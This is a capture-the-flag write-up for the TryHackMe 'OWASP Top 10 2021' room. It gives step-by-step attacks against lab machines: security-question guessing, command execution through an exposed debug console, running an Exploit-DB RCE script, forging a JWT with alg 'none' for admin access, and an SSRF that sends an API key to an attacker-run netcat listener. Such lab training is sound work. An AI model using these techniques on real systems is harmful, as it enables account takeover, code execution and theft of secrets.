OWASP Top 10 2021
Table of Contents
Write up for the challenges in the tryhackme room OWASP Top 10 2021.
1 Task 11 Insecure design
Visit the page http://MACHINE_IP:PORT
and click on the 'I forgot my
password' link and enter the username joseph
. You will be brought to
a page where you have to answer a security question. Two questions
might be easily guessed:
What is you first pet's current address?
With possible answers:
- Heaven
- Hell
What is your favourite color?
Possible answers:
- blue
- green
- black
- red
After trying these answers it turns out green
is joseph's favourite
color. We are given a new password with which we can login to his
account and read the flag from flag.txt
2 Task 12 Security Misconfiguration
Go to http://MACHINE_IP:PORT/console
and enter in the console
import os; print(os.popen("ls -l").read())
The database file name is: todo.db
To get the value of secret_flag
inside app.py
run from the console:
print(os.popen("grep secret_flag app.py").read())
The flag is:
3 Task 15 Vulnerable And Outdated Components
Go to the page http://MACHINE_IP:PORT
. After look around the website
for a bit the most interesting page in the admin login page. Trying
as username:password
turns out to actually work. After
some more browsing it is unclear what to do so the hint suggests to
search for 'remote command executions in bookstore app', which bring
up https://www.exploit-db.com/exploits/47887. Downloading this script
to the attackbox and executing it with:
python 47887.py
results in RCE. Type y
when prompted on the command line and
cat /opt/flag.txt
to get the flag
4 Task 20 Data Integrity Failures
The password for the guest
account is guest
Find the cookie as described in the task description and base64
decode the first two values.
echo "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9" | base64 -d echo echo "eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNjk4Mjk4ODUxfQ==" | base64 -d
{"typ":"JWT","alg":"HS256"} {"username":"guest","exp":1698298851}
Note that the second decoded value must be padded with two =
because there must be a multiple of 4 characters in the encoded
Now change the username
to 'admin' and the alg
to 'none' and
base64 encode those strings.
echo '{"username":"admin","exp":1698298851}' | base64 echo '{"typ":"JWT","alg":"none"}' | base64
eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjk4Mjk4ODUxfQo= eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0K
replace the cookie values with the new encoded values seperated with a dot (do not include the original signature)
Refresh the web pages to get the flag:
5 Task 21 Security Logging And Monitoring Failures
When you open the supplied file it is obvious the IP of the attacker is:
And the type of attack is:
brute force
6 Task 22 Server Side Request Forgery
Go to the admin area, it will tell you only localhost
can login as
Checking the source of the home page of this website you can see that
the download resume
button points to:
To get the API key, open a terminal on the attackbox and run:
nc -lvp 8080
then via the browser go to http://machine_ip:port/ATTACKBOX_IP:8080&id=1 the API key wil then be shown on the netcat terminal:
6.1 Extra Mile
Because the admin page is only accessible from localhost
we can do
the same trick as before but instead of using netcat
you use
as the server, with /admin
as path. However if you try
to go to
http://machine_ip:port/download?server=localhost:8087/admin&id=1 you
will notice that it downloads download.pdf
, which is empty. We need
to somehow make the server ignore the id
(we can not leave id
of the url). A trick to do this is to use the pound sign, #
. The
pound sign must be url encode, %23
, to have the server decode it and
send a request to http://localhost:8087/admin#&id=1 which will then ignore
the id
So the attack url will be: http://machine_ip:port/download?server=localhost:8087/admin%23&id=1
And the flag is: